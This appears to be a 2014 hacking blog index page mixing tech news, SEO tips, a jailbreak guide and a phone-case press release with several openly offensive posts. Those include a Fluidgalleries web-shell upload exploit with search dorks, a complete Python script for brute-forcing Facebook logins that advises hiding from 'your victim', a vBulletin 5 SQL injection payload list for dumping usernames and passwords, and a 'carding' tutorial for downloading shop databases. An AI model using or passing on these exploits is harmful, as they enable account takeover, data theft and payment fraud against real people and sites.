Introduction Burp Suite Part V (Repeater Tab)

Burp Repeater is a simple tool for manually manipulating and reissuing individual HTTP requests, and analyzing the application's responses. You can use Repeater for all kinds of purposes, such as changing parameter values to test for input-based vulnerabilities, issuing requests in a specific sequence to test for logic flaws, and reissuing requests from Burp Scanner results to manually verify reported issues.

The easiest way to start working with Repeater is to select the request you want to work on within another Burp tool (such as the Proxy history or Target site map), and use the "Send to Repeater" option on the context menu. This will create a new request tab in Repeater, and automatically populate the target details and request message editor with the relevant details. You can then modify and issue the request as required.

 When your request is ready to send, click the "Go" button to send it to the server. The response is displayed when this is received, together with the response length and a timer (in milliseconds). You can use the usual HTTP message editor functions to help analyze the request and response messages, and carry out further actions.

Managing Request Tabs

 You can easily manage Repeater's request tabs. You can: 

• Rename tabs by double-clicking the tab header.
• Reorder tabs by dragging them.
• Open a new tab by clicking on the right-most "..." tab.
• Close tabs by clicking the X button in the tab header.

(Click image for large view)

Source : Burp Suite Official Site

Like it ? Share it.

Read more

by Malik korrich ~ lundi 30 juin 2014 0 commentaires

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:

inurl:"fluidgalleries/dat/info.dat"

 inurl:"/fluidgalleries/php/"

Exploit:

http://localhost/[path]/fluidgalleries/php/photo-upload.php

*Use Firefox...

Use Live HTTP Headers... Then go to here:

http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg] 

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :

http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :

http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf

Read more

by Malik korrich ~ 0 commentaires

Maligno Open Source Penetration Testing Tool Operate Metaspolit Payloads

Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Changelog: 
Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation.

Download here

Read more

by Malik korrich ~ 0 commentaires

Google Is Going To Shutdown Orkut On 30 September 2014

Google Is Going To Shutdown Orkut on 30 September 2014. Orkut is social networking website and its most popular in Brazil. But now Google has decided to shutdown Orkut on 30 September and none of the user can create account by July 2014. Users can take archive by Google Takeaway. Orkut was launched at 10 years ago and at the same year Facebook was launched but Orkut failed to create its place on top Social Network website. Google is currently running Google + social networking website and have 540 million active users and the company doesn't get much profit by running Orkut service.

Google said, "If you don't want your posts or name to be included in the community archive, you can remove Orkut permanently from your Google account,".

Orkut said in the blog,

We will shut down Orkut on September 30, 2014. Until then, there will be no impact on current Orkut users, to give the community time to manage the transition. People can export their profile data, community posts and photos using Google Takeout (available until September 2016). Starting today, it will not be possible to create a new Orkut account.

---

Share this article Link with your friends
Google Is Going To Shutdown Orkut On 30 September 2014.. http://www.igadgetware.com/2014/07/google-is-going-to-shutdown-orkut-on-30.html #iGadgetware

Follow iGadgetware on Facebook , Twitter, Google+

Read more

by Malik korrich ~ 0 commentaires

Hack Your iPhone Untethered Jailbreak For iOS 7.1 And iOS 7.1.1 Available

Pangu released Untethered Jailbreak For iOS 7.1 and iOS 7.1.1. Pangu team members are all security researchers belong from China. Team released its first Jailbreak for iOS. Pangu untethered jailbreak is compatible with iPhone 5s, iPhone 5c, iPhone 4S, iPhone 4, iPad Air, iPad 4, iPad 3, iPad 2, iPad mini, Retina iPad mini and iPod touch 5G running iOS 7.1-iOS 7.1.1.

What is Jailbreak:
Jailbreak is an process to removing iOS limitation. We can modify the operating system running on Apple devices. If you jailbreak the device you can take advantage to install third party apps in your phone.

Steps to follow:

-> Make sure you have iTunes installed. 
-> Edit your iPhone's date to June 2, 2014 
-> Open the PanGu.exe file 
-> Click the black button to the right (also UNCHECK THE CHECKMARK where you see random characters and the "PP") 
-> As soon as the "brush stroke" loading bar fills to 20%, the PanGu app will appear on your phone 
-> Tap it Select Continue 
-> It will fill the loading brush stroke until 80% and your iTunes will open (it will only open IF you have iTunesHelper.exe on your Windows Taskbar) 
-> Close iTunes 
-> Your device will reboot
 -> When it opens again, wait for the brush stroke to complete to 100% 
-> Your device will reboot once more 
-> The process will be finished 100%
 -> The PanGu app will be replaced with Cydia 
-> Do your usual stuff by opening Cydia and continue with what you want to install by then.
 -> For precautionary measures, install Complete PPSync Remover (on http://cydia.angelxwind.net repo) because even though you uncheck the "PP" on step 4, it installs it anyway (internally without the app showing)

Compatible Devices:
This Untethered Jailbreak is compatible with following devices running iOS 7.1-iOS 7.1.1: 
-> iPhone 5s
 -> iPhone 5c 
-> iPhone 4S 
-> iPhone 4
 -> iPad Air 
-> iPad 4 
-> iPad 3 
-> iPad 2 
-> iPad mini 
-> Retina iPad mini 
-> iPod touch 5G

Video:

 
Download
For Mac 
For Windows

Read more

by Malik korrich ~ dimanche 29 juin 2014 0 commentaires

How To Optimize Your Website In 7 Simple Steps

How To Optimize Your Website In 7 Simple Steps ?
We are creating a website for our Business, personal or any other challenging stuff. But mostly we think about to generate the traffic on our website and want to place our website link to all search engine. But we don't know some rules of search engine, where we did slight mistake during develop the website. Today we are giving you some simple steps to optimize your website.

1. Use Meta Keywords , Description And Title Tags:
Some search engines mostly use Meta Keywords , Description And Title Tags for describe a site in search engine results. Write the actual Keywords which relate to your website.  But Google changed the rule for the same, Googlebots does not use meta tag keyword. Google bot is Google's web crawling bot can be called 'spider'. Crawling is the process by which Google bot find latest updated pages to be added to the Google index.

Example: 

Define descriptions for search engines:


Define keywords for search engines:


Define Author of your website:


Refresh the page at every 60 seconds:

2. Use Primary, Secondary And Tertiary Keyword:
Use Primary Keyword

header Tag. Primary keywords is the most important to optimize your web pages, while secondary keywords are less important its supports to Primary keyword. 

Example:
Primary Keyword are "Earn Money Online"
& Secondary Keyword should be "Earn Money Online By Adsense

Tertiary Keywords are group of keywords but not more than 10 keywords. These keywords use behind the secondary keywords in web page description and meta-tags keywords.

By choose Keyword is important part to optimize your website it defines your website about for. Best keywords are describing your website. As we known many users are only search keywords to find the information related keywords.

3. Site Map

Site Maps are very useful for SEO. Its tell about your website to search engines mostly for Google. It defines to list of web pages crawlers in XML. Sitemap can helpful in SEO where web developers can publish list of links from their sites. SiteMap introduced by Google. XML (Extensible Markup Language) is much more precise than HTML coding. Google Webmaster Tools allow a website owner to upload a sitemap that Google will crawl, or  can fulfill the same thing with the robots.txt file. Errors are not endured, and so syntax must be exact. 

You can use follow link to create your website Site Map

http://www.xml-sitemaps.com

http://validator.w3.org

4. Build Backlinks:

To build a backlinks is increase your Google Page rank. You can build by using Guest post or link exchange. Its also known as incoming links, inbound links, in-links, and inward links. The most numbers of backlinks indicate the popularity of your website.

5. Use Alt Tags in Pictures:

By using Alt Tags describe about your photo and its search in Google images. Your alt tag must related about your photo, otherwise it will be pondered spam by Google.

6. Be Always Update Your Content:

Be Always Update Your Content, your fresh content is always utilize by search engine. Search engine always re-crawls the website regular basis and adjust the information according to search. Visitors are always look latest information to study. Your website mainly featured with regular updates better use blogs and RSS feeds, where you can update the articles related about your company or related the websites.

7.  Test Your Website Load Time

Always Test Your Website Load Time of your website. Remove errors  whose can effect in load and make correct them to faster. It matters to SEO because its effects to search engine, Also use tools such as the YSlow and PageSpeed plug-ins for Chrome and Firefox, Less load time will more helpful to visitors. Think if someone internet is slow than how they can open your website. Your website is not more than 2 seconds to load the web page. Otherwise your visitors can bounce from the website.

Use follow online tools 

http://gtmetrix.com

http://tools.pingdom.com/fpt

Read more

by Malik korrich ~ 0 commentaires

Super Minimalist Wallet Raises IQ of Your Smartphone By RIYO Phone Case

Super Minimalist Wallet Raises IQ of Your Smartphone

When you're out on the town, the last thing you need is to fumble around with a bulky wallet and your smartphone ... uncool!   To help your cool factor and simplify your life, we created Riyo.  Riyo is a smartphone case that seamlessly blends with a super sleek, minimalist wallet.  Now, you can carry up to three of your most important cards securely and wrap your expensive iPhone 5/5s in a stylish, shock protective case.  With Riyo’s ingenious design, you can smoothly remove any daily use cards from its holder with just a single finger flick.  Now you can pay the tab or pick up an important call without ever interrupting your life.

Press Release:

FOR IMMEDIATE RELEASEJune 28, 2014 – Salt Lake City, Utah
Local Startup Now Funding Production of Riyo Phone Case and Card HolderRiyo is the groundbreaking phone case that doubles as a minimalist wallet. Riyo’s unique front edge design stands out from the crowd when compared with other phone cases, and none offer the functionality that allows consumers to feel secure while out and about. With a multitude of colors and style options to choose from, Riyo offers a unique array of additional features that users will find both functional and fashionable.
Riyo’s modern design allows the user to carry up to 3 cards without the bulk of a larger phone case, and it snugly holds your phone with a premium fit and feel. The one of a kind “Kanga Pouch” keeps your cards from falling out, but is easily accessible, even while using one hand. The case design is slick, so that it moves in and out of your pocket simply. The priority in creating Riyo was functionality, and no phone case provides greater ease of use.

The great part about this manufacturing & design process is that we are so close to it. It takes a lot of work to keep things so simple, and it is all made here at home supporting US manufacturing. This simply isn’t your traditional plastic mobile phone case. The design stands out. Using premium materials really lets us deliver both a design and functional experience without cutting any corners.
We’ve designed and prototyped the case. We’ve figured out our supply chain. We need your help to take the next step and put Riyo into production. We’re looking for funds to build the molds. We know what we’re doing; we’ve led the development and manufacturing of several multi-million dollar products – so we know exactly what’s required to pull this off.
We are currently running a Kickstarter campaign to fund the production of Riyo. Please contact Dan Almazan at danalmazan@gmail.comfor press inquiries.
Kickstarter campaign - http://kck.st/TwHXTg(or http://riyocase.com), Twitter: @riyocase

Read more

by Malik korrich ~ samedi 28 juin 2014 0 commentaires

HTML5 Modern Day Attack And Defence Vectors

Lately, A lot of people have been asking me the reason of my absence and not being active on RHA. The answer is that there are countless factors to which I have lost count myself. Had it been one, I might have remembered it. First of all i was very busy with my studies and also I had been working on my final year project because its right around the corner. All this work had been consuming a lot if my time and then came the task of promoting my upcoming book "Ethical Hacking and Penetration Testing Guide" which took about 10 months of time period to write. Along with it, i have been exploring new horizons with Web Application Firewalls and working on a tool to automatically bypass blacklist based WAF.

From a research point of view, I spent last four months researching on attack vectors with HTML5 and documented them in an easy to understand manner as a part of my semester project. However, i made several modifications later on to match the standards so that I could publish it on my blog.

IT has been more than six years since the advent of HTML5 (dated back 2008), and as the time has passed by we have seen more and more websites utilizing HTML5 features and have witnessed that technologies like flash and silverlight are dying slowly.

However, each of the HTML5 features could bring security issues if not used correctly, one of the major security issues with HTML5 is DOM Based XSS due to the heavy use of javascript in HTML5 based applications which would obviously be the prime highlight of this paper.

 Being a firm believer of free education, here I present to you "HTML5 Modern Day Attack And Defence Vectors" free of cost and free of ads. Last but not least, I would like to sincerely thank "lavakumar kuppan" for his tremendous help and without him the quality of the paper would have been compromised. I hope you find it helpful.

You can download the paper by clicking the "DOWNLOAD" button below:

What's next? 

I also spent some time in researching previously unknown vulnerabilities with Mobile browsers and applications. As soon as they are fixed, I would be disclosing couple of ZERO day vulnerabilities in various apps, browsers etc which i found during my encounter with Qmobile Noir A20 which uses a customized version of Android OS. So Stay Tuned.  

Timeline

6/29/2014 - Fixed spelling mistakes and references.  

7/7/2014 - Fixed more spelling and code formatting mistakes

Read more

by Malik korrich ~ 0 commentaires

[PYTHON] Facebook Pentester 2014 by mauritania attacker

                FACEBOOK PENTESTER 2014 BY MAURITANIA ATTACKER

Create a Dir and place it in C:\ and place also this python script inside it and create a text file , wordlist pass must be in this form:

Target@facebook.com::password
Target@facebook.com::12345
Target@facebook.com::123456
Target@facebook.com::1234567
Target@facebook.com::pa$$w0rd
Target@facebook.com::12345678
Target@facebook.com::123456789
Target@facebook.com::1216565
Target@facebook.com::214548554
Target@facebook.com::5463513
Target@facebook.com::45453452

Like Combo Attack Old School ^_^ and run script from cmd \!/ good chance




#!/usr/bin/python
#Facebook Pentester 2014 can crack into Facebook Id's 100% without Interruption By Facebook Firewall !
#This program is for sale & the objectif of this product is only for educational purposes only.
#Changing Description of this Script won't make you the coder ^_^ !
#Don't Crack people facebook account's it's illegal !
#If you want to crack into someone's account, you must have the permission of the user.
#Mauritania Attacker is not responsible.

import re
import os
import sys
import random
import warnings
import time
try:
        import mechanize
except ImportError:
        print "[*] Please install mechanize python module first"
        sys.exit(1)
except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
try:
        import cookielib
except ImportError:
        print "[*] Please install cookielib python module first"
        sys.exit(1)
except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__Script__   = "Facebook Pentester 2014 Priv8888!"
__Released__ = "27/01/2014 By Mauritania Attacker"
__moi__  = "Facebook Checkpoint Security Bypassed 100%"
verbose         = False
useproxy        = False
usepassproxy    = False
log             = 'ghost.log'
file            = open(log, "a")
success         = 'home_edit_profile'
checkpoint      = 'checkpoint'
oldpass         = 'You entered an old password'
fblogin         = 'https://login.facebook.com/login.php?login_attempt=1'
# some priv8 useragents for Facebook Security !
useragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
                'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
                'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                'Opera/8.00 (Windows NT 5.1; U; en)',
                'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
                'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
                'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
                ]
facebook        = '''

#Facebook Pentester 2014 Priv8.
#Coded By Mauritania Attacker.
#Features: Verbose Method + Intrusion.
#Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.

Script : %s
New Security Bypass : %s
Released    : %s''' % (__Script__, __moi__, __Released__)
option          = '''
Usage  : %s -w pentest.txt
Option : -w, --wordlist               |   Wordlist used for Cracking
         -v, --verbose                          |   Set %s will be verbose
         -p, --proxy                 |   Set http proxy will be use
         -k, --usernameproxy          |   Set username at proxy will be use
         -i, --passproxy              |   Set password at proxy will be use
         -l, --log                    |   Specify output filename (default : ghost.log)
         -h, --help                       |   Print this help

Example : %s -w pentest.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme             = '''
Usage : %s -w pentest.txt
        -h or --help for get help
        ''' % sys.argv[0]

def helpme():
        print facebook
        print option
        file.write(facebook)
        file.write(option)
        sys.exit(1)

def helpmee():
        print facebook
        print hme
        file.write(facebook)
        file.write(hme)
        sys.exit(1)

for arg in sys.argv:
        try:
                if arg.lower() == '-u' or arg.lower() == '--user':
                        username = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                        wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-l' or arg.lower() == '--log':
                        log = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-p' or arg.lower() == '--proxy':
                        useproxy = True
                        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                        usepassproxy = True
                        usw = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                        usepassproxy = True
                        usp = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-v' or arg.lower() == '--verbose':
                        verbose = True
                elif arg.lower() == '-h' or arg.lower() == '--help':
                        helpme()
                elif len(sys.argv) <= 1:
                        helpmee()
        except IOError:
                helpme()
        except NameError:
                helpme()
        except IndexError:
                helpme()

def bruteforce(word):
        try:
                pos = word.find("::")
                userEmail = word[0:pos]
                word = word[pos+len("::"):len(word)]
              
                print("userEmail: " + userEmail )
                print("password: " + word )
                file.write("[*] Trying " + userEmail + "::" + word + "\n" )
                sys.stdout.flush()
                rch = random.choice(useragent)
                br.addheaders = [('User-agent', rch)]
                # print("User Agent: " + rch )
                opensite = br.open(fblogin)

                # To show and print all forms name
                # for form in br.forms():
                #      print "Form name:", form.name
                #      print form

                # To show all control elements in the form
                # br.form = list(br.forms())[0]
                # for control in br.form.controls:
                #      print control
                #      print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])

                # To dump cookies data being sent and received
                # dump();

                # Release email account from autotext fill
                # If email still auto-filled on login form, this script would not work as expected, so we need to release it

                NotMe = "notme_cuid"
                for link in br.links():
                        if (NotMe in link.url):
                                request = br.click_link(link)
                                response = br.follow_link(link)
                                # print response.geturl()

                br.select_form(nr=0)

                br.form = list(br.forms())[0]
                br.form['email'] = userEmail
                br.form['pass'] = word
                br.submit()
                response = br.response().read()

                if verbose:
                        print response
                if success in response:
                        print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
                        print "[*] userEmail : %s" % (userEmail)
                        print "[*] Password : %s\n" % (word)
                        file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
                        file.write("\n[*] userEmail : %s" % (userEmail))
                        file.write("\n[*] Password : %s\n\n" % (word))

                        # After the successful login, force to Logout (to clear the cookies & the session - Very important!)
                        for form in br.forms():
                                if form.attrs['id'] == 'logout_form':
                                        br.form = form
                                        br.submit()
                elif checkpoint in response:
                        print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
                        print "[*] userEmail : %s" % (userEmail)
                        print "[*] Password : %s\n" % (word)
                        file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
                        file.write("\n[*] userEmail : %s" % (userEmail))
                        file.write("\n[*] Password : %s\n\n" % (word))

                        # In checkpoint, this account maybe has been logged in, so we need to Log it Out after the successful login
                        LogOut = "logout.php"
                        for link in br.links():
                                if (LogOut in link.url):
                                        request = br.click_link(link)
                                        response = br.follow_link(link)
                                        # print response.geturl()
                                        # print "This account has been logged out"
                                # else:
                                #        print "Can not click Log Out link"
                      
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                sys.exit(1)
        except mechanize._mechanize.FormNotFoundError:
                print "\n[*] Form Not Found\n"
                file.write("\n[*] Form Not Found\n")
                sys.exit(1)
        except mechanize._form.ControlNotFoundError:
                print "\n[*] Control Not Found\n"
                file.write("\n[*] Control Not Found\n")
                sys.exit(1)

# Priv8 Function to Dump Cookies Data
# def dump():
#       for cookie in cj:
#               print cookie.name, cookie.value

def releaser():
        global word
        for word in words:
                bruteforce(word.replace("\n",""))

def main():
        global br
        global words
        # Priv8 Function to enable dump()
        # global cj
        try:
                br = mechanize.Browser()
                cj = cookielib.LWPCookieJar()
                br.set_cookiejar(cj)
                br.set_handle_equiv(True)
                br.set_handle_gzip(True)
                br.set_handle_redirect(True)
                br.set_handle_referer(True)
                br.set_handle_robots(False)
                br.set_debug_http(False)
                br.set_debug_redirects(False)
                br.set_debug_redirects(False)
                br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
                if useproxy:
                        br.set_proxies({"http": proxy})
                if usepassproxy:
                        br.add_proxy_password(usw, usp)
                if verbose:
                        br.set_debug_http(True)
                        br.set_debug_redirects(True)
                        br.set_debug_redirects(True)
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                file.write("\n[*] Exiting program...\n")
                sys.exit(1)
        try:
                preventstrokes = open(wordlist, "r")
                words          = preventstrokes.readlines()
                count          = 0
                while count < len(words):
                        words[count] = words[count].strip()
                        count += 1
        except IOError:
                print "\n[*] Error: Check your config path\n"
                file.write("\n[*] Error: Check your config path\n")
                sys.exit(1)
        except NameError:
                helpme()
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                file.write("\n[*] Exiting program...\n")
                sys.exit(1)
        try:
                print facebook
                print "\n[*] Starting Cracking at %s" % time.strftime("%X")
                #print "[*] Account To Crack %s" % (username)
                print "[*] Loaded :",len(words),"words"
                print "[*] Cracking, please wait..."
                file.write(facebook)
                file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))
                #file.write("\n[*] Account To Crack %s" % (username))
                file.write("\n[*] Loaded : %d words" % int(len(words)))
                file.write("\n[*] Cracking, please wait...\n")
        except KeyboardInterrupt:
                print "\n[*] Script Closed...\n"
                sys.exit(1)
        try:
                releaser()
                bruteforce(word)
        except NameError:
                helpme()

if __name__ == '__main__':
        main()

...Mauritania attacker...
meet hackers
www.meethackers.com

Read more

by Malik korrich ~ 0 commentaires

vBulletin 5.0.0 All Beta Release SQL Injection Exploit 0day

Dork:

Powered by vBulletin™ Version 5.0.0 Beta

Stuffs Needed:

Firefox + HTTP Live Header 

1. Choose any forums... Create an account then activate it.

2. Find any posts... But i think you should find admin's post... 

3. Open HTTP Live Header then click on "LIKE"...

4. Then go on Send POST Content and use below Query , just add the Below Query after "noteid=somenumber".

Query:

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*The Above SQLi command will fetch out the first record from user table(username/password). 

*See The username and pass in encrypted get the salt to and decrypt it i wont show decrypting, use your brain :)

Other SQLi Syntaxes:

Version():

) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

User():

) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Database():

) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

 Database Print:

 ) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

 Table Count:

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

 Print Tables:

) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Columns Of Selected Tables:

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Fetch Out Data:

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

NEXUS 

Read more

by Malik korrich ~ 0 commentaires

apt-get command know more about it

Read more

by Malik korrich ~ jeudi 26 juin 2014 0 commentaires

New Version Of Android Lollipop 5.0 Announced In Google I/O Event

New Version Of Android Lollipop 5.0 Announced In Google I/O Event

Google updated their latest Android "L" Named Lollipop. It will support 64 bit and running on snapdragon 808 and 810 processor. Google confirms that it is releasing an NDK updated includes to 64bit support. So we think it will include fast running processor. Its expected to come at the launch of Nexus 9. 

As we known Apple Siri and Microsoft Cortana recently launched. So how can be Google left behind. New Android version will also featured security with Kill switch mechanism and improve to help battery life.

In Android Lollipop Google works on Voice Security features. Its little unique features as we known fingerprint scanner available in iOS and Android devices too. But Voice recognization is quite different from other features Google makes possibilities with its latest Android Operating System 

Google also working with current project 'Hera' which represent multitasking, where users can perform tasks without opening the app.

Android Runtime (ART) is introduces by L developer preview to improved development and debugging features

Whats new in Android 5.0

>> Advance Camera Capture 
>> New Gaming Addons
>> Material Design
>> Enhanced Notifications

Video:

Read more

by Malik korrich ~ 0 commentaires

Carding Tutorial - PDShopPro Shopping Cart

Dork:

allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is 

 www.example.com/shop/category.asp?catid=2

4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see some thing like this.

 

5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb
7- You will be prompted to save the file/open it.

  

8- Click save file and open it with Microsoft Access or any other XLS Reader

 

 Watch the Video

 

Read more

by Malik korrich ~ 0 commentaires